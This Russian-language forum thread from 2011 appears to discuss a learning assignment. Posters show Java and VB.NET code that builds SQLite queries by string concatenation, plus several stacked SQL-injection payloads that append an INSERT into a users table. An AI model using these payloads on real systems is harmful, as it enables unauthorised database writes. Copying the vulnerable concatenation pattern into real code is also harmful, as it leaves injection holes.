[sqlite + java] / SQLite

ReSQL.ru

2.0.56

Планшетная версия Контакт Правила FAQ Помощь

Гость

Войти | Профиль | Очистить

Нов. | Гор. | Избр.

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Действия ...

Доб. в избранное
Игнор. тему
Прикреп. тему
Пометить прочит. / непрочит.
Фильтр:
Сообщения автора темы
Сообщение содержит вложения
Сообщение содержит картинки
Сообщение содержит видеоклипы
Сообщение содержит аудиоклипы
Сообщение содержит картинки или видео 18+

Форумы / SQLite [игнор отключен] [закрыт для гостей] / [sqlite + java] / 3 сообщений из 3, страница 1 из 1

02.07.2011, 01:34

#37333342

vladimir22

Гость

[sqlite + java]

здравствуйте, ест такой код:

Код: plaintext

1.
2.
3.
4.
5.
6.

java.sql.Connection conn = DriverManager.getConnection("jdbc:sqlite:test.db");
Statement stat = conn.createStatement();
...
String sql = "select * from users WHERE username='" + username + "' AND password='" + password + "';";
...
ResultSet rs = stat.executeQuery(sql);

задание: записать в базу новую запись (sql injection)

Код: plaintext

1.
2.

user1'; insert into users ('username','password') values ('w1','w2');--
user1' or '1'='1'; insert into users values ('w1','w2');--

перепробывал уже кучу выриантов((((
помогите саветом кто знает...

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

06.07.2011, 21:57

#37340210

vladimir22

Гость

[sqlite + java]

vladimir22,

pravelni otvet nelza -)))

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

07.07.2011, 12:16

#37340914

VSVLAD

Участник

Откуда: Краснодар
Сообщения: 1 379
Рейтинг: 0 / 0

[sqlite + java]

Только в поучительных целях !

Допустим есть функция которая принимает два параметра Имя и Пароль:
Реализация на VB.NET

Код: plaintext

1.
2.
3.
4.

Function Test(ByVal Name As String, ByVal Password As String) As Integer
	Dim SQLBase As New SQLBase 'Создаём объект БД (мой фреймворк)
	SQLBase.Open("D:\P.sdb")   'Открываем соединение
	SQLBase.getExec("SELECT * FROM Users WHERE Name='" & Name & "' AND Password='" & Password & "';")
End Function

Тогда инъекция будет выглядеть так, для вызова функции:

Код: plaintext

Test("'; INSERT INTO Users ('Name','Password') VALUES ('TestUser','12345'); --", "")

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

Форумы / SQLite [игнор отключен] [закрыт для гостей] / [sqlite + java] / 3 сообщений из 3, страница 1 из 1

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=54&mobile=1&tid=2009163]:	0ms
get settings:	9ms
get forum list:	13ms
check forum access:	3ms
check topic access:	3ms
track hit:	259ms
get topic data:	11ms
get forum data:	2ms
get page messages:	45ms
get tp. blocked users:	2ms
others:	377ms

total:	724ms